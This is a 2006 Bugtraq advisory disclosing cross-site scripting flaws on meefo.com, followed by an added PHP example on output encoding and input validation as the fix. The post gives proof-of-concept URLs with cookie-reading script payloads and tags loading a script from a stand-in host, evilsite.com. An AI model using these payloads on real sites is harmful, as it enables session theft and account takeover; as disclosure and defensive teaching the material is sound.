Bugtraq mailing list archives

Meefo.com - XSS with cookie include


From: luny () youfucktard com
Date: 10 Jun 2006 21:38:05 -0000

Meefo.com

Homepage:
http://meefo.com

Affected files:
reading profiles
index.php
input boxes on profiles
sending private msgs

------------------------------

Reading a profile, with cookie include PoC:
Since data isn't properly filtered (backslashes are added to ' and "), a user can input malicious data, such as <script>alert(document.cookie)</script>, and it will pop up with the user's cookie. Included at the end of this article are screenshots of the cookie vuln. Screenshots meefo4 and meefo5.jpg show this.

http://meefo.com/?do=rdprof&user_pp=username<script>alert(document.cookie)</script>

When editing your profile, data isn't properly filtered in the input boxes either, so <script>alert(document.cookie)</script> works here too.

Another XSS Vulnerability example:
http://meefo.com/?do=rdprof&user_pp=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>

Reading categories XSS Vuln:
http://meefo.com/index.php?cat=Poetry<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>

Sending PMs XSS Vuln:
http://meefo.com/?messages=send&to=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>


Screenshots of cookie include vulns & more:

http://www.youfucktard.com/xsp/meefo1.jpg
http://www.youfucktard.com/xsp/meefo2.jpg
http://www.youfucktard.com/xsp/meefo3.jpg
http://www.youfucktard.com/xsp/meefo4.jpg
http://www.youfucktard.com/xsp/meefo5.jpg
http://www.youfucktard.com/xsp/meefo6.jpg
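
The filter described in the post (backslashes added before ' and ") leaves < and > untouched, which is why the script tag in user_pp is echoed back intact. The following is an added example, not part of the original post and not meefo.com's code: the function names and the username rule are assumptions, and it contrasts that filter with HTML output encoding of the same value.

```php
<?php
// Added example: hypothetical handlers, not meefo.com's actual code.

// What the advisory observes: backslashes are added before ' and ".
// addslashes() reproduces that behaviour (as did PHP's old magic_quotes_gpc).
function render_profile_weak(string $userPp): string
{
    return '<h1>Profile of ' . addslashes($userPp) . '</h1>';
}

// Encode for the HTML context on output: <, >, &, " and ' become entities,
// so the browser shows the text instead of parsing it as markup.
function render_profile_encoded(string $userPp): string
{
    return '<h1>Profile of '
        . htmlspecialchars($userPp, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '</h1>';
}

// Defence in depth: accept only the shape a username should have.
// The allowed character set and length are assumptions for this example.
function valid_username(string $userPp): bool
{
    return preg_match('/\A[A-Za-z0-9_.-]{1,32}\z/', $userPp) === 1;
}

// Constructed inputs: a plain name, a name with an apostrophe, and the
// payload quoted in the advisory.
$samples = [
    'username',
    "O'Brien",
    'username<script>alert(document.cookie)</script>',
];

foreach ($samples as $value) {
    echo 'input:    ', $value, PHP_EOL;
    echo 'weak:     ', render_profile_weak($value), PHP_EOL;
    echo 'encoded:  ', render_profile_encoded($value), PHP_EOL;
    echo 'accepted: ', valid_username($value) ? 'yes' : 'no', PHP_EOL, PHP_EOL;
}

// HttpOnly keeps the session cookie out of document.cookie, which limits what
// an injected script can read; it does not replace output encoding.
// (Array form of session_set_cookie_params is available from PHP 7.3.)
// session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
```

The same encoding applies to the cat and to parameters listed in the post, and to profile fields when they are written back into input boxes.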

